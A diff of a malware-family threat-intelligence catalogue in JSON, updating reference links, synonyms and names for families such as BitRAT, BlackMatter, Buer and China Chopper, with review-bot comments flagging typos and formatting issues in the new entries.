+ "https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/",
+ "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
 ],
 "synonyms": [],
 "type": []
@@ -9951,10 +11346,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat",
- "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
 "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
 "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md",
- "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/"
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt"
 ],
 "synonyms": [],
 "type": []
@@ -9962,6 +11364,19 @@
 "uuid": "8c4363f4-4f38-4a5a-bc87-16f0721bd03b",
 "value": "BitRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bizarro",
+ "https://securelist.com/bizarro-banking-trojan-expands-its-attacks-to-europe/102258/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "00fb2087-7e08-4649-ac93-9547deda7aca",
+ "value": "Bizzaro"
+ },
 {
 "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.",
 "meta": {
@@ -10008,7 +11423,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
 "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
- "https://threatconnect.com/blog/casting-a-light-on-blackenergy/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
 "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
 "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
 "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/",
@@ -10021,8 +11436,10 @@
 "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
 "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
 "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
 "https://www.secureworks.com/research/blackenergy2",
 "https://marcusedmondson.com/2019/01/18/black-energy-analysis/",
+ "https://threatconnect.com/blog/casting-a-light-on-blackenergy/",
 "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf"
 ],
 "synonyms": [],
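Review bot: The new entry's `value` is spelled `Bizzaro`, while both refs added in the same hunk name the family `bizarro` (`.../details/win.bizarro` and `.../bizarro-banking-trojan-expands-its-attacks-to-europe/`), so the display name looks like a typo. Suggest `"value": "Bizarro"`; if the alternate spelling is intentional, add the published spelling to `synonyms` so lookups by the name used in the cited reports still match.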
@@ -10036,8 +11453,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware",
+ "https://news.sophos.com/en-us/2021/03/23/black-kingdom/",
 "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html",
- "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html"
+ "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://securelist.com/black-kingdom-ransomware/102873/"
 ],
 "synonyms": [],
 "type": []
@@ -10045,15 +11466,45 @@
 "uuid": "246b6563-edd8-49c7-9d3c-97dc1aec6b81",
 "value": "BlackKingdom Ransomware"
 },
+ {
+ "description": "Ransomware-as-a-Service ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/",
+ "https://blog.minerva-labs.com/blackmatter",
+ "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/",
+ "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/",
+ "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter",
+ "https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html",
+ "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
+ "https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f838f3bb-a36b-49df-8f8c-1bb8cf66b736",
+ "value": "BlackMatter (Windows)"
+ },
 {
 "description": "Advanced and modern Windows botnet with PHP panel developed using VB.NET",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat",
- "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html",
- "https://labs.k7computing.com/?p=21365",
 "https://github.com/BlackHacker511/BlackNET/",
+ "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html",
 "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/",
+ "https://labs.k7computing.com/?p=21365",
+ "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware",
 "https://github.com/FarisCode511/BlackNET/"
 ],
 "synonyms": [],
@@ -10142,7 +11593,7 @@
 "value": "BlackRouter"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby",
@@ -10153,7 +11604,7 @@
 "type": []
 },
 "uuid": "617d53dd-1143-4146-bbc0-39e975a26fe5",
- "value": "Blackruby Ransomware"
+ "value": "Blackruby"
 },
 {
 "description": "",
@@ -10235,6 +11686,20 @@
 "uuid": "b34fd401-9d37-4bc6-908f-448c1697f749",
 "value": "BLINDTOAD"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bloodystealer",
+ "https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/",
+ "https://twitter.com/3xp0rtblog/status/1380087553676697617"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ecdc0a43-8845-4dc4-a3f0-de2f0142aa4d",
+ "value": "BloodyStealer"
+ },
 {
 "description": "",
 "meta": {
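Review bot: The new BlackMatter entry's description `"Ransomware-as-a-Service "` carries a trailing space, unlike the other descriptions in view, and it will surface verbatim in any UI or export that renders the field; suggest `"description": "Ransomware-as-a-Service"`. The ref `https://blog.group-ib.com/blackmatter#` also ends in an empty fragment marker that can be dropped without changing the target.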
@@ -10251,6 +11716,24 @@
 "uuid": "cf542e2d-531c-4d34-98c8-7e3cb26a32af",
 "value": "BLUETHER"
 },
+ {
+ "description": "Avast describe this malware as a recombination of other malware including SpyEx, ThunderFox, ChromeRecovery, StormKitty, and firepwd.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blustealer",
+ "https://decoded.avast.io/anhho/blustealer/",
+ "https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/",
+ "https://twitter.com/GoSecure_Inc/status/1437435265350397957",
+ "https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer"
+ ],
+ "synonyms": [
+ "a310logger"
+ ],
+ "type": []
+ },
+ "uuid": "cb4bfed3-3042-4a29-a72d-c8b5c510faea",
+ "value": "BluStealer"
+ },
 {
 "description": "",
 "meta": {
@@ -10356,8 +11839,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok",
- "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
- "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe"
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe",
+ "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html"
 ],
 "synonyms": [],
 "type": []
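Review bot: The new BluStealer description has a subject–verb disagreement, `Avast describe this malware`; suggest `"description": "Avast describes this malware as a recombination of other malware including SpyEx, ThunderFox, ChromeRecovery, StormKitty, and firepwd."`. The rest of the entry follows the same shape as its neighbours.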
@@ -10445,7 +11929,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab",
 "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/",
- "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html"
+ "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -10503,6 +11988,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005",
 "https://github.com/nccgroup/Royal_APT",
 "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
 ],
 "synonyms": [],
@@ -10543,22 +12029,34 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
 "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/",
+ "http://www.secureworks.com/research/threat-profiles/gold-symphony",
+ "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
+ "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
 "https://blog.minerva-labs.com/stopping-buerloader",
- "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/",
- "https://twitter.com/StopMalvertisin/status/1182505434231398401",
 "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/",
- "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
 "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://twitter.com/SophosLabs/status/1321844306970251265",
- "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/"
+ "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://twitter.com/StopMalvertisin/status/1182505434231398401",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96",
+ "https://twitter.com/SophosLabs/status/1321844306970251265"
 ],
 "synonyms": [
- "Buerloader"
+ "Buerloader",
+ "RustyBuer"
 ],
 "type": []
 },
@@ -10632,6 +12130,7 @@
 "http://malware-traffic-analysis.net/2017/05/09/index.html",
 "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/",
 "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
 "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/"
 ],
 "synonyms": [],
@@ -10742,6 +12241,23 @@
 "uuid": "52c0b49b-d57e-400d-8808-a00d4171ac05",
 "value": "CALMTHORN"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader",
+ "https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://unit42.paloaltonetworks.com/bazarloader-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2bf8ef91-a220-49aa-a7b9-0437d2ee0b15",
+ "value": "campoloader"
+ },
 {
 "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.",
 "meta": {
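Review bot: The new entry's `"value": "campoloader"` is the only lower-case display name among the entries this commit adds (`BloodyStealer`, `BluStealer` and `Chaos` are capitalised), and its `"description"` is left empty although the refs include dedicated analyses. If the Malpedia display name for win.campoloader differs from the slug, the value should follow it; consumers of this galaxy see the value as the label. A one-sentence description drawn from the linked Orange Cyberdefense or Unit 42 analyses (what it loads, how it is distributed) would make the entry usable without opening the refs.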
@@ -10788,6 +12304,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak",
 "https://threatintel.blog/OPBlueRaven-Part1/",
+ "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/",
 "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html",
 "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe",
 "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
@@ -10797,10 +12314,11 @@
 "https://www.secureworks.com/research/threat-profiles/gold-niagara",
 "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest",
 "https://threatintel.blog/OPBlueRaven-Part2/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html",
 "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html",
 "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
 "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html"
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/"
 ],
 "synonyms": [
 "Anunak"
@@ -10815,6 +12333,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://blog.avast.com/2013/04/08/carberp_epitaph/",
 "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf",
 "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf"
@@ -10947,13 +12466,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
+ "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
 "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
+ "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
 "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/"
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
 ],
 "synonyms": [],
 "type": []
@@ -10979,8 +12504,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot",
 "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/",
- "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec",
- "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack"
+ "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/",
+ "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/",
+ "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack",
+ "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec"
 ],
 "synonyms": [],
 "type": []
@@ -10988,6 +12515,23 @@
 "uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6",
 "value": "Chainshot"
 },
+ {
+ "description": "In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a \"Ryuk .Net Ransomware Builder\" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos",
+ "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/",
+ "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html"
+ ],
+ "synonyms": [
+ "FakeRyuk",
+ "RyukJoke"
+ ],
+ "type": []
+ },
+ "uuid": "fb760029-9331-4ba0-b644-d47a8e6d3ad2",
+ "value": "Chaos"
+ },
 {
 "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.",
 "meta": {
@@ -11016,7 +12560,7 @@
 "type": []
 },
 "uuid": "22b03600-505c-41d4-ba1c-45d70cc2e123",
- "value": "CHCH Ransomware"
+ "value": "CHCH"
 },
 {
 "description": "",
@@ -11105,34 +12649,59 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper",
+ "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
 "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.youtube.com/watch?v=rn-6t7OygGk",
 "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers",
 "https://www.secureworks.com/research/threat-profiles/bronze-express",
 "https://unit42.paloaltonetworks.com/china-chopper-webshell/",
 "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/",
+ "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/",
 "https://www.secureworks.com/research/threat-profiles/bronze-president",
 "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day",
 "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
 "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
 "https://twitter.com/ESETresearch/status/1366862946488451088",
+ "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html",
 "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
 "https://redcanary.com/blog/microsoft-exchange-attacks",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks",
+ "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers",
 "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968",
 "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits",
 "https://attack.mitre.org/software/S0020/",
 "https://blog.joshlemon.com.au/hafnium-exchange-attacks/",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
 "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/",
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
 "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
+ "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
 "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-259a",
+ "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
+ "https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/",
+ "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
 "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-259a",
+ "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
 "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
+ "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
